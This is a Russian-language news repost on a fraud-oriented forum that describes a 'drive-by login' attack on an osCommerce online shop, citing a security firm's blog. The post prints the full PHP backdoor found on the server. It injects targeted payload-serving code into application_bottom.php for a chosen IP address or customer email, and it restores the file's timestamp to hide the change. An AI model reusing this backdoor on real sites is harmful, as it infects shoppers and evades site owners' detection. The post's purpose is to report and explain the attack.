MoneyMaker - здесь делают деньги! MoneyMaker - здесь делают деньги!

Форум Darkmoney Форум Дубликат
Дроп-сервис
probivbiz
Курсы по анонимности и безопасности Чат Манимейкера
Благотворительный фонд
Гарант-сервис, безопасные покупки


Вернуться   MoneyMaker - здесь делают деньги! > Информационный раздел > Новости из СМИ


Новости из СМИ Новости из средств массовой информации, связанные с тематикой форума MoneyMaker.

garant
Ответ
 
LinkBack Опции темы Опции просмотра
Старый 09.04.2015, 06:48   #1
Забанен
 
Регистрация: 24.11.2014
Сообщений: 252
Депозит: 0 р.
Сделок через ГАРАНТ: 0
Покупок через ГАРАНТ:
По умолчанию Атака типа “drive-by login”: заражение после авторизации

Специалистам по информационной безопасности хорошо известны атаки типа “drive-by download”. Под этим термином подразумевают, что скачивание зловреда произошло без ведома пользователя, как только он открыл определённую веб-страницу в браузере.

Сейчас появилась новая разновидность этой техники, которую по аналогии назвали “drive-by login”.

О таком виде атаки рассказывается в блоге компании High-Tech Bridge. Она столкнулась с ним при обслуживании одного из своих клиентов — среднего размера интернет-магазина из Центральной Европы.

Один из покупателей магазина пожаловался, что сайт пытается заразить его компьютер вредоносной программой. В то же время рутинное сканирование с проверкой на зловреды и уязвимости не выявило ничего подозрительного. Магазин работал на последней версии osCommerce Online Merchant v2.3.4, выпущенной в июне 2014 года.

Сначала специалисты подумали, что здесь ложная тревога, но потом выяснилось, что всё гораздо серьёзнее. На сервере нашли интересный файл под названием ozcommerz_pwner.php.bak, вот его содержимое.

PHP код:
<?php

# osCommerce 2.x.x universal user pwner by Piht0z
# tested on osCommerce-2.3.4
# keep priv8 && **** white hats

$victim_ip = "127.0.0.1";
$victim_email = "[Ссылки могут видеть только зарегистрированные пользователи. ]";
$pack="http://host/bl.js";

$time = filectime("includes/application_bottom.php");
if(isset($_GET['del'])) {
$str = file_get_contents("includes/application_bottom.php");
$str = preg_replace('/\<\?\s.*/ms','',$str);
file_put_contents("includes/application_bottom.php",$str);
} else {
file_put_contents("includes/application_bottom.php", '<?
$str = "";
$ip = explode(".",$_SERVER["REMOTE_ADDR"]);
if($ip[0].".".$ip[1].".".$ip[2].".".$ip[3] == "'.$victim_ip.'")
{ echo $str; }
if ( is_int($_SESSION["customer_id"]) &&
($_SESSION["customer_id"] > 0) ) {
$customer_info_query = tep_db_query("select customers_email_address from "
. TABLE_CUSTOMERS . " where customers_id = \'" .
(int)$_SESSION["customer_id"] . "\'");
$customer_info = tep_db_fetch_array($customer_info_query);
if($customer_info["customers_email_address"] == "'.$victim_email.'") {
echo $str;
}
}
?>', FILE_APPEND);
}
touch("includes/application_bottom.php",$time);
?>
Неизвестные хакеры любезно оставили комментарии в коде, так что несложно разобраться в работе универсального бэкдора для osCommerce.

Бэкдор внедряет вредоносный код в скрипт /includes/application_bottom.php, чтобы загружать зловред с удалённого сервера, в зависимости от IP-адреса пользователя или его адреса электронной почты, для зарегистрированных пользователей. Таким образом, скачивание зловреда осуществлялось после авторизации в магазине.

На данный момент бэкдор не определяется ни одним антивирусом.

Специалисты считают, что атаки типа “drive-by login” могут получить широкое распространение в будущем: они очень эффективны и их трудно обнаружить.

• Source: htbridge.com/blog/drive_by_login_attack_the_end_of_safe_web.html
a_r_t вне форума   Ответить с цитированием
Ответ

Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Trackbacks are Вкл.
Pingbacks are Вкл.
Refbacks are Вкл.



Текущее время: 11:26. Часовой пояс GMT.

Bes73 Bes73
garant
garant

Powered by vBulletin® Version 3.8.11
Copyright ©2000 - 2019, vBulletin Solutions, Inc. Перевод:
Search Engine Optimization by vBSEOzCarot
MoneyMaker.hk